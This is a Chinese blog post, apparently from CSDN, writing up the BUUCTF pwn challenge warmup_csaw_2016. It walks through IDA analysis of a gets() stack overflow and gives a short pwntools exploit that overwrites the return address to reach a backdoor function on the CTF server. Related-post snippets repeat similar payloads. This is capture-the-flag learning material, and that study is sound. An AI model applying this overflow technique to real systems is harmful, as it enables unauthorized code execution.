BUUCTF刷题之路-warmup_csaw_20161

已于 2023-05-29 00:59:30 修改
阅读量302 收藏 1
点赞数 1
文章标签: python
于 2023-05-27 12:03:58 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_30528603/article/details/130899597
版权

这题原本昨天就打算发的,刚做完电脑死机了。老规矩那道题IDA分析找到主函数,如图:

 大概明确函数的执行流程。而且我们在主函数一眼就看到一个危险函数gets,大概率就是个栈溢出。然后我们又在IDA中发现有system和一个后门函数,那这题就非常简单,跟上一题是一个思路的。

我们去虚拟机看下这个程序开启了哪些保护:

保护基本没开。那我们就直接栈溢出覆盖返回地址到后门函数,这题就做完了。在主函数中我们看到v5变量离rbp距离是0x40h,因为是64位程序还得加8才到返回地址。因此我们的exp如下:

from pwn import *
sh=remote('node4.buuoj.cn',27679)
#sh = process('./warmup_csaw_2016')
buf2_addr = 0x40060d
sh.sendline(b'A'*72 + p64(buf2_addr))
sh.interactive()

得到flag。

call就不要ret
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
warmup_csaw_2016
m0_52231248的博客
11-02 118
题目环境是Ubuntu16默认libc2.23 Cheksec程序架构是amd64没有开启任何保护 运行程序程序给我们提示了wow:0x4006d Get函数存在栈溢出,offest=0x40+8个字节 快捷键g跳转程序提示的0x4006d, 发现存在后门函数system(“cat flag.txt”) 于是我们构造exp: from pwn import* r=remote("node4.buuoj.cn",27357) cat...
pytorch-gradual-warmup-lr:PyTorch的逐步预热学习速率调度程序
02-05
$ pip install git+https://github.com/ildoonet/pytorch-gradual-warmup-lr.git 用法 请参阅文件。 import torch from torch . optim . lr_scheduler import StepLR , ExponentialLR from torch . optim . sgd ...
warmup_csaw_2016 1
weixin_52034946的博客
01-13 802
先checksec 是64位,小端序 进入ida,查看字符串 有一个cat flag 的字符串,跟进去,是这个函数,也就是执行这个函数我们就可以得到flag 一如既往的来到了main 函数处, 也是看到了get函数,一般就是栈溢出了,v5的大小位0x40,再加上是64位,所以要输入0x40+8,来造成栈溢出 脚本 from pwn import* r=remote(‘node3.buuoj.cn’,28011) flag_addr = 0x40060D payload = ‘a’*(0x40+8)+p6
BUUCTF web之WarmUp 源代码详解
good good study
11-18 2345
前言前言访问除了一张滑稽图,就没其他的了查看源码,有一个注释了的 source.php,可以尝试直接访问一下。同时进行目录扫描访问source.php,里面包含php代码,题目说了是php代码审计,那就先从这里进行分析提取其中的php代码代码分析1. 代码整体结构分析前面两个条件很好满足,只需要 source.php?file=字符串 ,即可。所以重点需要让checkeFile函数返回true,则会进行文件包含2. chechkFile()函数分析。
Buuctf-Web-[HCTF 2018]Warm Up 题解&代码审计
m0_62239233的博客
04-22 1254
Buuctf-Web-[HCTF 2018]Warm Up 题解&代码审计
CTF buuoj pwn-----第3题:warmup_csaw_2016
bing_Max的博客
08-29 1651
CTF buuoj pwn-----第3题:warmup_csaw_2016前言一、pandas是什么?二、使用步骤1.引入库2.读入数据总结前言一、pandas是什么?二、使用步骤1.引入库2.读入数据总结创建一个表格设定内容居中、居左、居右SmartyPants创建一个自定义列表如何创建一个注脚注释也是必不可少的KaTeX数学公式新的甘特图功能,丰富你的文章UML 图表FLowchart流程图导出与导入导出导入 前言 提示:这里可以添加本文要记录的大概内容: 例如:随着人工智能的不断发展,机器学习这门技
buuctf web warmup详细题解
weixin_64160292的博客
03-31 3024
题目:warmup 题目来源:buuctf 分析过程: 1. 首先ctrl + u 查看源代码,我们发现有一个source.php文件 2. 我们打开source.php文件,是一段代码,这道题要我们代码审计。 3. 与source文件相似的hint.php文件我们也打开看一下,它说flag在ffffllllaaaagggg中。 正在上传… 4. 然后回来source.php看这段代码,通过上网查询关于php的函数的用法。然后审计代码得出,...
PyPI 官网下载 | warmup_scheduler-0.3.tar.gz
01-30
资源来自pypi官网。 资源全名:warmup_scheduler-0.3.tar.gz
0ctf_2016_warmup
05-17
2016年0ctf的pwn题。
treinamento-maps_solid_agile-oo-warmup:MAPS SA的SOLID培训的热身项目
05-07
training-maps_solid_agile-oo-warmup 由MAPS SA的Akira A.进行的SOLID培训的热身项目。 Maven项目。 运行:mvn -quiet Program1是由MessageFormatterAndLogger表示的库的客户端。 这个“库”有一个小的设计问题。 ...
serverless-plugin-warmup:在冬天保持lambda温暖。 :hot_springs:
01-30
安装通过npm在无服务器服务的根目录中安装: npm install --save-dev serverless-plugin-warmup 将插件添加到Serverless serverless.yaml的plugins数组中: plugins : - serverless-plugin-warmup组态预热插件支持...
buuctfwarmup_csaw_2016
weixin_54452942的博客
03-25 327
发现了一个gets函数可以溢出,并且在上面的运行中,我们看到他输出了一个地址,在下面的sprintf函数中将一个函数的地址输出了,我们去看看这个函数是干什么的。一种是ida直接看(不一定准),40h是64字节,再加8字节的rbp就是ret的位置。这里的返回地址,也就是rbp下面的地址是df28,我们输入的‘aaaaa’在dee0。是一个没有保护机制的64位x86架构的小端可执行程序。断在main函数地址,或者调用gets函数的地址也行。减一下刚好和ida中的一样。两种方式获得填充数据大小。
PWN学习记录(3)BUUCTF-warmup_csaw_2016
m0_58824086的博客
08-01 366
由**char v5[64]**可得,在main函数的栈帧中,划分了一个64字节的存储空间,也就是说只需要存入64个字节地址,就可以get函数返回地址。下载题目得到 warmup_csaw_2016,利用 file 命令查看该文件的类型,再通过checksec ./filename查看保护机制。将warmup_csaw_2016文件放入IDA中查看,打开字符串窗口。可得该文件是64位且该题任何保护都没有打开,所以我们可以实现最简单的栈溢出。将exp文件输入进1.py中,Esc+:wq保存并退出1.py。
buuctfWarmUp
qq_38634097的博客
04-17 488
通过代码审计,我们知道了需要满足三个条件,前两个为file不为空且为字符串,那么可以构造pyload为:?file=hint.php.(我们已经知道source.php文件源码是什么了,所以直接用hint.php即可)我们已知,hint.php在白名单,flag在ffffllllaaaagggg,mb_strpos($page . '?结合已知条件,再次进行代码审计,寻找突破口。开题一张笑脸,无他,查看网页源码,看到提示source.php,在url后加/source.php,打开结果如下,
【Pwn | CTF】BUUCTF warmup_csaw_2016
weixin_46301214的博客
02-04 421
天命:第二题pwn,这次知道了目标就是瞄准system函数,如果里面是 /bin/sh 之类的就是直接getshell,如果是普通命令的话,应该就是getflag了。点进去变量,然后这里开始我就不懂了,别人wp就说这里是40空间+8空间(8空间就是覆盖64位下rbp的长度)sub_40060D这个函数就是重点,点进去一看就是我们的目标system("cat flag.txt")那就要拿到两个东西:sub_40060D函数的入口地址 和 v5变量的缓冲区大小。条件一:获取sub_40060D函数入口地址。
buuctf warmup 超详细
m0_74196038的博客
03-13 903
if (in_array($page, $whitelist)) { //使用in_array函数,判断某个元素是否在数组当中,这里是字典的话,就是判断某个值是否在数组当中存在,注意,字典只会判断某个值。$_page = mb_substr( //mb_substr和substr的功能大致都是一致的,用来截取子串,但是mb有个特点就是,它可以指定字符编码,在处理非英文字符时会比较好。//是否在字典当中存在,也就是说查找的是值,而不是键。
BUUCTF-warmup_csaw_2016 (新手pwner的成长日记3)
最新发布
weixin_58410275的博客
04-23 983
解释一下这里填充数据为什么是4*16,我们在ida里面双击v5这个字符进入栈区一看,它是在s的基础上,从0到40的var_40占用的是4*16个字节的空间,+8是因为64位文件的rbp需要填充。的函数,进去一看,不得了不得了,我们的payload直接利用sub_40060D函数就行了,甚至不需要获取shell权限,地址在反编译之前可以在函数末尾看见的,就不做展示了。由于文件的漏洞函数直接打开了flag文件,所以我们直接得到了flag的交互。然后我们再翻一翻,找一找,有个。gets的内容,这里思路就到达。
buuctf warmup_csaw_2016
yidalipao1的博客
09-03 456
buuctf pwn
[BUUCTF-PWN] warmup_csaw_2016
m0_46098032的博客
01-03 350
下载文件,checksec看一下,保护都没开,64位文件。 用IDA64打开文件,查看一下main函数。可以看到明显的栈溢出漏洞(gets)。 看一下v5,v5大小是 0x40, 返回地址是8 字节, 溢出大小就是0x48。 sub_40060D有点可疑,双击看一下。发现这里就是system函数,我们在构造pyaload的时候加上sub_40060D。 exp为: from pwn import * p = remote('node4.buuoj.cn', 2574...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值